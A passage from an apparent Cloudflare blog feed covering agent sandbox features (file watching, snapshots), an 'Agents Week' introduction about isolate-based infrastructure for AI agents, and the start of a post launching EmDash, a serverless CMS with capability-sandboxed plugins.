    <p>Modern development loops are event-driven. Save a file, rerun the build. Edit a config, restart the server. Change a test, rerun the suite.</p><p>We shipped <i>sandbox.watch()</i> in March. It returns an SSE stream backed by native <a href="https://man7.org/linux/man-pages/man7/inotify.7.html"><u>inotify</u></a>, the kernel mechanism Linux uses for filesystem events.</p>
            <pre><code>import { parseSSEStream, type FileWatchSSEEvent } from '@cloudflare/sandbox';

const stream = await sandbox.watch('/workspace/src', {
  recursive: true,
  include: ['*.ts', '*.tsx']
});

for await (const event of parseSSEStream&lt;FileWatchSSEEvent&gt;(stream)) {
  if (event.type === 'modify' &amp;&amp; event.path.endsWith('.ts')) {
    await sandbox.exec('npx tsc --noEmit', { cwd: '/workspace' });
  }
}
</code></pre>
            <p>This is one of those primitives that quietly changes what agents can do. An agent that can observe the filesystem in real time can participate in the same feedback loops as a human developer.</p>
    <div>
      <h2>Waking up quickly with snapshots</h2>
      <a href="#waking-up-quickly-with-snapshots">
        
      </a>
    </div>
    <p>Imagine a (human) developer working on their laptop. They <code>git clone</code> a repo, run <code>npm install</code>, write code, push a PR, then close their laptop while waiting for code review. When it’s time to resume work, they just re-open the laptop and continue where they left off.</p><p>If an agent wants to replicate this workflow on a naive container platform, you run into a snag. How do you resume where you left off quickly? You could keep a sandbox running, but then you pay for idle compute. You could start fresh from the container image, but then you have to wait for a long <code>git clone</code> and <code>npm install</code>.</p><p>Our answer is snapshots, which will be rolling out in the coming weeks.</p><p>A snapshot preserves a container's full disk state, OS config, installed dependencies, modified files, data files and more. Then it lets you quickly restore it later.</p><p>You can configure a Sandbox to automatically snapshot when it goes to sleep.</p>
            <pre><code>class AgentDevEnvironment extends Sandbox {
  sleepAfter = "5m";
  persistAcrossSessions = {type: "disk"}; // you can also specify individual directories
}
</code></pre>
            <p>You can also programmatically take a snapshot and manually restore it. This is useful for checkpointing work or forking sessions. For instance, if you wanted to run four instances of an agent in parallel, you could easily boot four sandboxes from the same state.</p>
            <pre><code>class AgentDevEnvironment extends Sandbox {}

async forkDevEnvironment(baseId, numberOfForks) {
  const baseInstance = await getSandbox(baseId);
  const snapshotId = await baseInstance.snapshot();

  const forks = Array.from({ length: numberOfForks }, async (_, i) =&gt; {
    const newInstance = await getSandbox(`${baseId}-fork-${i}`);
    return newInstance.start({ snapshot: snapshotId });
  });

  await Promise.all(forks);
}
</code></pre>
            <p>Snapshots are stored in <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a> within your account, giving you durability and location-independence. R2's <a href="https://developers.cloudflare.com/cache/how-to/tiered-cache/"><u>tiered caching</u></a> system allows for fast restores across all of Region: Earth.</p><p>In future releases, live memory state will also be captured, allowing running processes to resume exactly where they left off. A terminal and an editor will reopen in the exact state they were in when last closed.</p><p>If you are interested in restoring session state before snapshots go live, you can use the <a href="https://developers.cloudflare.com/sandbox/guides/backup-restore/"><code><u>backup and restore</u></code></a> methods today. These also persist and restore directories using R2, but are not as performant as true VM-level snapshots. Though they still can lead to considerable speed improvements over naively recreating session state.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/LzVucBiNvxOh3NFn0ukxj/3b8e6cd9a5ca241b6c6a7c8556c0a529/BLOG-3264_3.gif" />
          </figure><p><sup><i>Booting a sandbox, cloning  ‘axios’, and npm installing takes 30 seconds. Restoring from a backup takes two seconds.</i></sup></p><p>Stay tuned for the official snapshot release.</p>
    <div>
      <h2>Higher limits and Active CPU Pricing</h2>
      <a href="#higher-limits-and-active-cpu-pricing">
        
      </a>
    </div>
    <p>Since our initial launch, we’ve been steadily increasing capacity. Users on our standard pricing plan can now run 15,000 concurrent instances of the lite instance type, 6,000 instances of basic, and over 1,000 concurrent larger instances. <a href="https://forms.gle/3vvDvXPECjy6F8v56"><u>Reach out</u></a> to run even more!</p><p>We also changed our pricing model to be more cost effective running at scale. Sandboxes now <a href="https://developers.cloudflare.com/changelog/post/2025-11-21-new-cpu-pricing/"><u>only charge for actively used CPU cycles</u></a>. This means that you aren’t paying for idle CPU while your agent is waiting for an LLM to respond.</p>
    <div>
      <h2>This is what a computer looks like </h2>
      <a href="#this-is-what-a-computer-looks-like">
        
      </a>
    </div>
    <p>Nine months ago, we shipped a sandbox that could run commands and access a filesystem. That was enough to prove the concept.</p><p>What we have now is different in kind. A Sandbox today is a full development environment: a terminal you can connect a browser to, a code interpreter with persistent state, background processes with live preview URLs, a filesystem that emits change events in real time, egress proxies for secure credential injection, and a snapshot mechanism that makes warm starts nearly instant. </p><p>When you build on this, a satisfying pattern emerges: agents that do real engineering work. Clone a repo, install it, run the tests, read the failures, edit the code, run the tests again. The kind of tight feedback loop that makes a human engineer effective — now the agent gets it too.</p><p>We're at version 0.8.9 of the SDK. You can get started today:</p><p><code>npm i @cloudflare/sandbox@latest</code></p> ]]></content:encoded>
            <category><![CDATA[Agents Week]]></category>
            <category><![CDATA[Agents]]></category>
            <category><![CDATA[Containers]]></category>
            <category><![CDATA[Sandbox]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">7jXMXMjQUIpjGzJdPadO4a</guid>
            <dc:creator>Kate Reznykova</dc:creator>
            <dc:creator>Mike Nomitch</dc:creator>
        </item>
        <item>
            <title><![CDATA[Welcome to Agents Week]]></title>
            <link>https://blog.cloudflare.com/welcome-to-agents-week/</link>
            <pubDate>Sun, 12 Apr 2026 17:01:05 GMT</pubDate>
            <description><![CDATA[ Cloudflare's mission has always been to help build a better Internet. Sometimes that means building for the Internet as it exists. Sometimes it means building for the Internet as it's about to become. 

This week, we're kicking off Agents Week, dedicated to what comes next.
 ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare's mission has always been to help build a better Internet. Sometimes that means building for the Internet as it exists. Sometimes it means building for the Internet as it's about to become. </p><p>Today, we're kicking off Agents Week, dedicated to building the Internet for what comes next.</p>
    <div>
      <h2>The Internet wasn't built for the age of AI. Neither was the cloud.</h2>
      <a href="#the-internet-wasnt-built-for-the-age-of-ai-neither-was-the-cloud">
        
      </a>
    </div>
    <p>The cloud, as we know it, was a product of the last major technological paradigm shift: smartphones.</p><p>When smartphones put the Internet in everyone's pocket, they didn't just add users — they changed the nature of what it meant to be online. Always connected, always expecting an instant response. Applications had to handle an order of magnitude more users, and the infrastructure powering them had to evolve.</p><p>The approach the industry converged on was straightforward: more users, more copies of your application. As applications grew in complexity, teams broke them into smaller pieces — microservices — so each team could control its own destiny. But the core principle stayed the same: a finite number of applications, each serving many users. Scale meant more copies.</p><p>Kubernetes and containers became the default. They made it easy to spin up instances, load balance, and tear down what you didn't need. Under this one-to-many model, a single instance could serve many users, and even as user counts grew into the billions, the number of things you had to manage stayed finite.</p><p>Agents break this.</p>
    <div>
      <h2>One user, one agent, one task</h2>
      <a href="#one-user-one-agent-one-task">
        
      </a>
    </div>
    <p>Unlike every application that came before them, agents are one-to-one. Each agent is a unique instance. Serving one user, running one task. Where a traditional application follows the same execution path regardless of who's using it, an agent requires its own execution environment: one where the LLM dictates the code path, calls tools dynamically, adjusts its approach, and persists until the task is done.</p><p>Think of it as the difference between a restaurant and a personal chef. A restaurant has a menu — a fixed set of options — and a kitchen optimized to churn them out at volume. That's most applications today. An agent is more like a personal chef who asks: what do you want to eat? They might need entirely different ingredients, utensils, or techniques each time. You can't run a personal-chef service out of the same kitchen setup you'd use for a restaurant.</p><p>Over the past year, we've seen agents take off, with coding agents leading the way — not surprisingly, since developers tend to be early adopters. The way most coding agents work today is by spinning up a container to give the LLM what it needs: a filesystem, git, bash, and the ability to run arbitrary binaries.</p><p>But coding agents are just the beginning. Tools like Claude Cowork are already making agents accessible to less technical users. Once agents move beyond developers and into the hands of everyone — administrative assistants, research analysts, customer service reps, personal planners — the scale math gets sobering fast.</p>
    <div>
      <h2>The math on scaling agents to the masses</h2>
      <a href="#the-math-on-scaling-agents-to-the-masses">
        
      </a>
    </div>
    <p>If the more than 100 million knowledge workers in the US each used an agentic assistant at ~15% concurrency, you'd need capacity for approximately 24 million simultaneous sessions. At 25–50 users per CPU, that's somewhere between 500K and 1M server CPUs — just for the US, with one agent per person.</p><p>Now picture each person running several agents in parallel. Now picture the rest of the world with more than 1 billion knowledge workers. We're not a little short on compute. We're orders of magnitude away.</p><p>So how do we close that gap?</p>
    <div>
      <h2>Infrastructure built for agents</h2>
      <a href="#infrastructure-built-for-agents">
        
      </a>
    </div>
    <p>Eight years ago, we launched <a href="https://workers.cloudflare.com/"><u>Workers</u></a> — the beginning of our developer platform, and a bet on containerless, serverless compute. The motivation at the time was practical: we needed lightweight compute without cold-starts for customers who depended on Cloudflare for speed. Built on V8 isolates rather than containers, Workers turned out to be an order of magnitude more efficient — faster to start, cheaper to run, and natively suited to the "spin up, execute, tear down" pattern.</p><p>What we didn't anticipate was how well this model would map to the age of agents.</p><p>Where containers give every agent a full commercial kitchen: bolted-down appliances, walk-in fridges, the works, whether the agent needs them or not, isolates, on the other hand, give the personal chef exactly the counter space, the burner, and the knife they need for this particular meal. Provisioned in milliseconds. Cleaned up the moment the dish is served.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3UM1NukO0Ho4lQAYk5CoU8/30e1376c4fe61e86204a0de92ae4612b/BLOG-3238_2.png" />
          </figure><p>In a world where we need to support not thousands of long-running applications, but billions of ephemeral, single-purpose execution environments — isolates are the right primitive. </p><p>Each one starts in milliseconds. Each one is securely sandboxed. And you can run orders of magnitude more of them on the same hardware compared to containers.</p><p>Just a few weeks ago, we took this further with the <a href="https://blog.cloudflare.com/dynamic-workers/"><u>Dynamic Workers open beta</u></a>: execution environments spun up at runtime, on demand. An isolate takes a few milliseconds to start and uses a few megabytes of memory. That's roughly 100x faster and up to 100x more memory-efficient than a container. </p><p>You can start a new one for every single request, run a snippet of code, and throw it away — at a scale of millions per second.</p><p>For agents to move beyond early adopters and into everyone's hands, they also have to be affordable. Running each agent in its own container is expensive enough that agentic tools today are mostly limited to coding assistants for engineers who can justify the cost. <b>Isolates, by running orders of magnitude more efficiently, are what make per-unit economics viable at the scale agents require.</b></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6iiD7zACxMNEDdvJWM6zbo/2261c320f3be3cd2fa6ef34593a1ee09/BLOG-3238_3.png" />
          </figure>
    <div>
      <h2>The horseless carriage phase</h2>
      <a href="#the-horseless-carriage-phase">
        
      </a>
    </div>
    <p>While it’s critical to build the right foundation for the future, we’re not there yet. And every paradigm shift has a period where we try to make the new thing work within the old model. The first cars were called "horseless carriages." The first websites were digital brochures. The first mobile apps were shrunken desktop UIs. We're in that phase now with agents.</p><p>You can see it everywhere. </p><p>We're giving agents headless browsers to navigate websites designed for human eyes, when what they need are structured protocols like MCP to discover and invoke services directly. </p><p>Many early MCP servers are thin wrappers around existing REST APIs — same CRUD operations, new protocol — when LLMs are actually far better at writing code than making sequential tool calls. </p><p>We're using CAPTCHAs and behavioral fingerprinting to verify the thing on the other end of a request, when increasingly that thing is an agent acting on someone's behalf — and the right question isn't "are you human?" but "which agent are you, who authorized you, and what are you allowed to do?"</p><p>We're spinning up full containers for agents that just need to make a few API calls and return a result.</p><p>These are just a few examples, but none of this is surprising. It's what transitions look like.</p>
    <div>
      <h2>Building for both</h2>
      <a href="#building-for-both">
        
      </a>
    </div>
    <p>The Internet is always somewhere between two eras. IPv6 is objectively better than IPv4, but dropping IPv4 support would break half the Internet. HTTP/2 and HTTP/3 coexist. TLS 1.2 still hasn't fully given way to 1.3. The better technology exists, the old technology persists, and the job of infrastructure is to bridge both.</p><p>Cloudflare has always been in the business of bridging these transitions. The shift to agents is no different.</p><p>Coding agents genuinely need containers — a filesystem, git, bash, arbitrary binary execution. That's not going away. This week, our container-based sandbox environments are going GA, because we're committed to making them the best they can be. We're going deeper on browser rendering for agents, because there will be a long tail of services that don't yet speak MCP, and agents will still need to interact with them. These aren't stopgaps — they're part of a complete platform.</p><p>But we're also building what comes next: the isolates, the protocols, and the identity models that agents actually need. Our job is to make sure you don't have to choose between what works today and what's right for tomorrow.</p>
    <div>
      <h2>Security in the model, not around it</h2>
      <a href="#security-in-the-model-not-around-it">
        
      </a>
    </div>
    <p>If agents are going to handle our professional and personal tasks — reading our email, operating on our code, interacting with our financial services — then security has to be built into the execution model, not layered on after the fact.</p><p>CISOs have been the first to confront this. The productivity gains from putting agents in everyone's hands are real, but today, most agent deployments are fraught with risk: prompt injection, data exfiltration, unauthorized API access, opaque tool usage. </p><p>A developer's vibe-coding agent needs access to repositories and deployment pipelines. An enterprise's customer service agent needs access to internal APIs and user data. In both cases, securing the environment today means stitching together credentials, network policies, and access controls that were never designed for autonomous software.</p><p>Cloudflare has been building two platforms in parallel: our developer platform, for people who build applications, and our zero trust platform, for organizations that need to secure access. For a while, these served distinct audiences. </p><p>But "how do I build this agent?" and "how do I make sure it's safe?" are increasingly the same question. We're bringing these platforms together so that all of this is native to how agents run, not a separate layer you bolt on.</p>
    <div>
      <h2>Agents that follow the rules</h2>
      <a href="#agents-that-follow-the-rules">
        
      </a>
    </div>
    <p>There's another dimension to the agent era that goes beyond compute and security: economics and governance.</p><p>When agents interact with the Internet on our behalf — reading articles, consuming APIs, accessing services — there needs to be a way for the people and organizations who create that content and run those services to set terms and get paid. Today, the web's economic model is built around human attention: ads, paywalls, subscriptions. </p><p>Agents don't have attention (well, not that <a href="https://arxiv.org/abs/1706.03762"><u>kind of attention</u></a>). They don't see ads. They don't click through cookie banners.</p><p>If we want an Internet where agents can operate freely <i>and</i> where publishers, content creators, and service providers are fairly compensated, we need new infrastructure for it. We’re building tools that make it easy for publishers and content owners to set and enforce policies for how agents interact with their content.</p><p>Building a better Internet has always meant making sure it works for everyone — not just the people building the technology, but the people whose work and creativity make the Internet worth using. That doesn't change in the age of agents. It becomes more important.</p>
    <div>
      <h2>The platform for developers and agents</h2>
      <a href="#the-platform-for-developers-and-agents">
        
      </a>
    </div>
    <p>Our vision for the developer platform has always been to provide a comprehensive platform that just works: from experiment, to MVP, to scaling to millions of users. But providing the primitives is only part of the equation. A great platform also has to think about how everything works together, and how it integrates into your development flow.</p><p>That job is evolving. It used to be purely about developer experience, making it easy for humans to build, test, and ship. Increasingly, it's also about helping agents help humans, and making the platform work not just for the people building agents, but for the agents themselves. Can an agent find the latest most up-to- date best practices? How easily can it discover and invoke the tools and CLIs it needs? How seamlessly can it move from writing code to deploying it?</p><p>This week, we're shipping improvements across both dimensions — making Cloudflare better for the humans building on it and for the agents running on it.</p>
    <div>
      <h2>Building for the future is a team sport</h2>
      <a href="#building-for-the-future-is-a-team-sport">
        
      </a>
    </div>
    <p>Building for the future is not something we can do alone. Every major Internet transition from HTTP/1.1 to HTTP/2 and HTTP/3, from TLS 1.2 to 1.3 — has required the industry to converge on shared standards. The shift to agents will be no different.</p><p>Cloudflare has a long history of contributing to and helping push forward the standards that make the Internet work. We've been <a href="https://blog.cloudflare.com/tag/ietf/"><u>deeply involved in the IETF</u></a> for over a decade, helping develop and deploy protocols like QUIC, TLS 1.3, and Encrypted Client Hello. We were a founding member of WinterTC, the ECMA technical committee for JavaScript runtime interoperability. We open-sourced the Workers runtime itself, because we believe the foundation should be open.</p><p>We're bringing the same approach to the agentic era. We're excited to be part of the Linux Foundation and AAIF, and to help support and push forward standards like MCP that will be foundational for the agentic future. Since Anthropic introduced MCP, we've worked closely with them to build the infrastructure for remote MCP servers, open-sourced our own implementations, and invested in making the protocol practical at scale. </p><p>Last year, alongside Coinbase, we <a href="https://blog.cloudflare.com/x402/"><u>co-founded the x402 Foundation</u></a>, an open, neutral standard that revives the long-dormant HTTP 402 status code to give agents a native way to pay for the services and content they consume. </p><p>Agent identity, authorization, payment, safety: these all need open standards that no single company can define alone.</p>
    <div>
      <h2>Stay tuned</h2>
      <a href="#stay-tuned">
        
      </a>
    </div>
    <p>This week, we're making announcements across every dimension of the agent stack: compute, connectivity, security, identity, economics, and developer experience.</p><p>The Internet wasn't built for AI. The cloud wasn't built for agents. But Cloudflare has always been about helping build a better Internet — and what "better" means changes with each era. This is the era of agents. This week, <a href="https://blog.cloudflare.com/"><u>follow along</u></a> and we'll show you what we're building for it.</p> ]]></content:encoded>
            <category><![CDATA[Agents Week]]></category>
            <category><![CDATA[Agents]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Serverless]]></category>
            <guid isPermaLink="false">4dZj0C0XnS9BJQnxy2QkzY</guid>
            <dc:creator>Rita Kozlov</dc:creator>
            <dc:creator>Dane Knecht</dc:creator>
        </item>
        <item>
            <title><![CDATA[Introducing EmDash — the spiritual successor to WordPress that solves plugin security]]></title>
            <link>https://blog.cloudflare.com/emdash-wordpress/</link>
            <pubDate>Wed, 01 Apr 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Today we are launching the beta of EmDash, a full-stack serverless JavaScript CMS built on Astro 6.0. It combines the features of a traditional CMS with modern security, running plugins in sandboxed Worker isolates. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>The cost of building software has drastically decreased. We recently <a href="https://blog.cloudflare.com/vinext/"><u>rebuilt Next.js in one week</u></a> using AI coding agents. But for the past two months our agents have been working on an even more ambitious project: rebuilding the WordPress open source project from the ground up.</p><p>WordPress powers <a href="https://w3techs.com/technologies/details/cm-wordpress"><u>over 40% of the Internet</u></a>. It is a massive success that has enabled anyone to be a publisher, and created a global community of WordPress developers. But the WordPress open source project will be 24 years old this year. Hosting a website has changed dramatically during that time. When WordPress was born, AWS EC2 didn’t exist. In the intervening years, that task has gone from renting virtual private servers, to uploading a JavaScript bundle to a globally distributed network at virtually no cost. It’s time to upgrade the most popular CMS on the Internet to take advantage of this change.</p><p>Our name for this new CMS is EmDash. We think of it as the spiritual successor to WordPress. It’s written entirely in TypeScript. It is serverless, but you can run it on your own hardware or any platform you choose. Plugins are securely sandboxed and can run in their own <a href="https://developers.cloudflare.com/workers/reference/how-workers-works/"><u>isolate</u></a>, via <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/worker-loader/"><u>Dynamic Workers</u></a>, solving the fundamental security problem with the WordPress plugin architecture. And under the hood, EmDash is powered by <a href="https://astro.build/"><u>Astro</u></a>, the fastest web framework for content-driven websites.</p><p>EmDash is fully open source, MIT licensed, and <a href="https://github.com/emdash-cms/emdash"><u>available on GitHub</u></a>. While EmDash aims to be compatible with WordPress functionality, no WordPress code was used to create EmDash. That allows us to license the open source project under the more permissive MIT license. We hope that allows more developers to adapt, extend, and participate in EmDash’s development.</p><p>You can deploy the EmDash v0.1.0 preview to your own Cloudflare account, or to any Node.js server today as part of our early developer beta:</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/emdash-cms/templates/tree/main/blog-cloudflare"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>Or you can try out the admin interface here in the <a href="https://emdashcms.com/"><u>EmDash Playground</u></a>:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/50n8mewREzoxOFq2jDzpT9/6a38dbfbaeec2d21040137e574a935ad/CleanShot_2026-04-01_at_07.45.29_2x.png" />
          </figure>
    <div>
      <h3>What WordPress has accomplished</h3>
      <a href="#what-wordpress-has-accomplished">
        
      </a>
    </div>
    <p>The story of WordPress is a triumph of open source that enabled publishing at a scale never before seen. Few projects have had the same recognisable impact on the generation raised on the Internet. The contributors to WordPress’s core, and its many thousands of plugin and theme developers have built a platform that democratised publishing for millions; many lives and livelihoods being transformed by this ubiquitous software.</p><p>There will always be a place for WordPress, but there is also a lot more space for the world of content publishing to grow. A decade ago, people picking up a keyboard universally learned to publish their blogs with WordPress. Today it’s just as likely that person picks up Astro, or another TypeScript framework to learn and build with. The ecosystem needs an option that empowers a wide audience, in the same way it needed WordPress 23 years ago. </p><p>EmDash is committed to building on what WordPress created: an open source publishing stack that anyone can install and use at little cost, while fixing the core problems that WordPress cannot solve. </p>
    <div>
      <h3>Solving the WordPress plugin security crisis</h3>
      <a href="#solving-the-wordpress-plugin-security-crisis">
        
      </a>
    </div>
    <p>WordPress’ plugin architecture is fundamentally insecure. <a href="https://patchstack.com/whitepaper/state-of-wordpress-security-in-2025/"><u>96% of security issues</u></a> for WordPress sites originate in plugins. In 2025, more high severity vulnerabilities <a href="https://patchstack.com/whitepaper/state-of-wordpress-security-in-2026/"><u>were found in the WordPress ecosystem</u></a> than the previous two years combined.</p><p>Why, after over two decades, is WordPress plugin security so problematic?</p><p>A WordPress plugin is a PHP script that hooks directly into WordPress to add or modify functionality. There is no isolation: a WordPress plugin has direct access to the WordPress site’s database and filesystem. When you install a WordPress plugin, you are trusting it with access to nearly everything, and trusting it to handle every malicious input or edge case perfectly.</p><p>EmDash solves this. In EmDash, each plugin runs in its own isolated sandbox: a <a href="https://developers.cloudflare.com/dynamic-workers/"><u>Dynamic Worker</u></a>. Rather than giving direct access to underlying data, EmDash provides the plugin with <a href="https://blog.cloudflare.com/workers-environment-live-object-bindings/"><u>capabilities via bindings</u></a>, based on what the plugin explicitly declares that it needs in its manifest. This security model has a strict guarantee: an EmDash plugin can only perform the actions explicitly declared in its manifest. You can know and trust upfront, before installing a plugin, exactly what you are granting it permission to do, similar to going through an OAuth flow and granting a 3rd party app a specific set of scoped permissions.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4JDq2oEgwONHL8uUJsrof2/fb2ae5fcacd5371aaab575c35ca2ce2e/image8.png" />
          </figure><p>For example, a plugin that sends an email after a content item gets saved looks like this:</p>
            <pre><code>import { definePlugin } from "emdash";

export default () =&gt;
  definePlugin({
    id: "notify-on-publish",
    version: "1.0.0",
    capabilities: ["read:content", "email:send"],
    hooks: {
      "content:afterSave": async (event, ctx) =&gt; {
        if (event.collection !== "posts" || event.content.status !==    "published") return;

        await ctx.email!.send({
          to: "editors@example.com",
          subject: `New post published: ${event.content.title}`,
          text: `"${event.content.title}" is now live.`,
         });

        ctx.log.info(`Notified editors about ${event.content.id}`);
      },
    },
  });</code></pre>
            <p>This plugin explicitly requests two capabilities: <code>content:afterSave</code> to hook into the content lifecycle, and <code>email:send</code> to access the <code>ctx.email</code> function. It is impossible for the plugin to do anything other than use these capabilities. It has no external network access. If it does need network access, it can specify the exact hostname it needs to talk to, as part of its definition, and be granted only the ability to communicate with a particular hostname.</p><p>And in all cases, because the plugin’s needs are declared statically, upfront, it can always be clear exactly what the plugin is asking for permission to be able to do, at install time. A platform or administrator could define rules for what plugins are or aren’t allowed to be installed by certain groups of users, based on what permissions they request, rather than an allowlist of approved or safe plugins.</p>
    <div>
      <h3>Solving plugin security means solving marketplace lock-in</h3>
      <a href="#solving-plugin-security-means-solving-marketplace-lock-in">
        
      </a>
    </div>
    <p>WordPress plugin security is such a real risk that WordPress.org <a href="https://developer.wordpress.org/plugins/wordpress-org/plugin-developer-faq/#where-do-i-submit-my-plugin"><u>manually reviews and approves each plugin</u></a> in its marketplace. At the time of writing, that review queue is over 800 plugins long, and takes at least two weeks to traverse. The vulnerability surface area of WordPress plugins is so wide that in practice, all parties rely on marketplace reputation, ratings and reviews. And because WordPress plugins run in the same execution context as WordPress itself and are so deeply intertwined with WordPress code, some argue they must carry forward WordPress’ GPL license.</p><p>These realities combine to create a chilling effect on developers building plugins, and on platforms hosting WordPress sites.</p><p>Plugin security is the root of this problem. Marketplace businesses provide trust when parties otherwise cannot easily trust each other. In the case of the WordPress marketplace, the plugin security risk is so large and probable that many of your customers can only reasonably trust your plugin via the marketplace. But in order to be part of the marketplace your code must be licensed in a way that forces you to give it away for free everywhere other than that marketplace. You are locked in.</p><p>EmDash plugins have two important properties that mitigate this marketplace lock-in:</p><ol><li><p><b>Plugins can have any license</b>: they run independently of EmDash and share no code. It’s the plugin author’s choice.</p></li><li><p><b>Plugin code runs independently in a secure sandbox</b>: a plugin can be provided to an EmDash site, and trusted, without the EmDash site ever seeing the code.</p></li></ol><p>The first part is straightforward — as the plugin author, you choose what license you want. The same way you can when publishing to NPM, PyPi, Packagist or any other registry. It’s an open ecosystem for all, and up to the community, not the EmDash project, what license you use for plugins and themes.</p><p>The second part is where EmDash’s plugin architecture breaks free of the centralized marketplace.</p><p>Developers need to rely on a third party marketplace having vetted the plugin far less to be able to make decisions about whether to use or trust it. Consider the example plugin above that sends emails after content is saved; the plugin declares three things:</p><ul><li><p>It only runs on the <code>content:afterSave</code> hook</p></li><li><p>It has the <code>read:content</code> capability</p></li><li><p>It has the <code>email:send</code> capability</p></li></ul><p>The plugin can have tens of thousands of lines of code in it, but unlike a WordPress plugin that has access to everything and can talk to the public Internet, the person adding the plugin knows exactly what access they are granting to it. The clearly defined boundaries allow you to make informed decisions about security risks and to zoom in on more specific risks that relate directly to the capabilities the plugin is given.</p><p>The more that both sites and platforms can trust the security model to provide constraints, the more that sites and platforms can trust plugins, and break free of centralized control of marketplaces and reputation. Put another way: if you trust that food safety is enforced in your city, you’ll be adventurous and try new places. If you can’t trust that there might be a staple in your soup, you’ll be consulting Google before every new place you try, and it’s harder for everyone to open new restaurants.</p>
    <div>
      <h3>Every EmDash site has x402 support built in — charge for access to content</h3>
      <a href="#every-emdash-site-has-x402-support-built-in-charge-for-access-to-content">
        
      </a>
    </div>
    <p>The business model of the web <a href="https://blog.cloudflare.com/content-independence-day-no-ai-crawl-without-compensation/"><u>is at risk</u></a>, particularly for content creators and publishers. The old way of making content widely accessible, allowing all clients free access in exchange for traffic, breaks when there is no human looking at a site to advertise to, and the client is instead their agent accessing the web on their behalf. Creators need ways to continue to make money in this new world of agents, and to build new kinds of websites that serve what people’s agents need and will pay for. Decades ago a new wave of creators created websites that became great businesses (often using WordPress to power them) and a similar opportunity exists today.</p><p><a href="https://www.x402.org/"><u>x402</u></a> is an open, neutral standard for Internet-native payments. It lets anyone on the Internet easily charge, and any client pay on-demand, on a pay-per-use basis. A client, such as an agent, sends a HTTP request and receives a HTTP 402 Payment Required status code. In response, the client pays for access on-demand, and the server can let the client through to the requested content.</p><p>EmDash has built-in support for x402. This means anyone with an EmDash site can charge for access to their content without requiring subscriptions and with zero engineering work. All you need to do is configure which content should require payment, set how much to charge, and provide a Wallet address. The request/response flow ends up looking like this:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3IKfYGHF6Pgi3jQf1ERRQC/48815ffec3e204f4f2c6f7a40f232a93/image4.png" />
          </figure><p>Every EmDash site has a built-in business model for the AI era.</p>
    <div>
      <h3>Solving scale-to-zero for WordPress hosting platforms</h3>
      <a href="#solving-scale-to-zero-for-wordpress-hosting-platforms">
        
      </a>
    </div>
    <p>WordPress is not serverless: it requires provisioning and managing servers, scaling them up and down like a traditional web application. To maximize performance, and to be able to handle traffic spikes, there’s no avoiding the need to pre-provision instances and run some amount of idle compute, or share resources in ways that limit performance. This is particularly true for sites with content that must be server rendered and cannot be cached.</p><p>EmDash is different: it’s built to run on serverless platforms, and make the most out of the <a href="https://developers.cloudflare.com/workers/reference/how-workers-works/"><u>v8 isolate architecture</u></a> of Cloudflare’s open source runtime <a href="https://github.com/cloudflare/workerd"><u>workerd</u></a>. On an incoming request, the Workers runtime instantly spins up an isolate to execute code and serve a response. It scales back down to zero if there are no requests. And it <a href="https://blog.cloudflare.com/workers-pricing-scale-to-zero/"><u>only bills for CPU time</u></a> (time spent doing actual work).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3yIX0whveiJ7xQ9P20TeyA/84462e6ec58cab27fbd6bf1703efeabc/image7.png" />
          </figure><p>You can run EmDash anywhere, on any Node.js server — but on Cloudflare you can run millions of instances of EmDash using <a href="https://developers.cloudflare.com/cloudflare-for-platforms/"><u>Cloudflare for Platforms</u></a> that each instantly scale fully to zero or up to as many RPS as you need to handle, using the exact same network and runtime that the biggest websites in the world rely on.</p><p>Beyond cost optimizations and performance benefits, we’ve bet on this architecture at Cloudflare in part because we believe in having low cost and free tiers, and that everyone should be able to build websites that scale. We’re excited to help platforms extend the benefits of this architecture to their own customers, both big and small.</p>
    <div>
      <h3>Modern frontend theming and architecture via Astro</h3>
      <a href="#modern-frontend-theming-and-architecture-via-astro">
        
      </a>
    </div>
    <p>EmDash is powered by Astro, the web framework for content-driven websites. To create an EmDash theme, you create an Astro project that includes:</p><ul><li><p><b>Pages</b>: Astro routes for rendering content (homepage, blog posts, archives, etc.)</p></li><li><p><b>Layouts:</b> Shared HTML structure</p></li><li><p><b>Components:</b> Reusable UI elements (navigation, cards, footers)</p></li><li><p><b>Styles:</b> CSS or Tailwind configuration</p></li><li><p><b>A seed file:</b> JSON that tells the CMS what content types and fields to create</p></li></ul><p>This makes creating themes familiar to frontend developers who are <a href="https://npm-stat.com/charts.html?package=astro&amp;from=2024-01-01&amp;to=2026-03-30"><u>increasingly choosing Astro</u></a>, and to LLMs which are already trained on Astro.</p><p>WordPress themes, though incredibly flexible, operate with a lot of the same security risks as plugins, and the more popular and commonplace your theme, the more of a target it is. Themes run through integrating with <code>functions.php</code> which is an all-encompassing execution environment, enabling your theme to be both incredibly powerful and potentially dangerous. EmDash themes, as with dynamic plugins, turns this expectation on its head. Your theme can never perform database operations.</p>
    <div>
      <h3>An AI Native CMS — MCP, CLI, and Skills for EmDash</h3>
      <a href="#an-ai-native-cms-mcp-cli-and-skills-for-emdash">
        
      </a>
    </div>
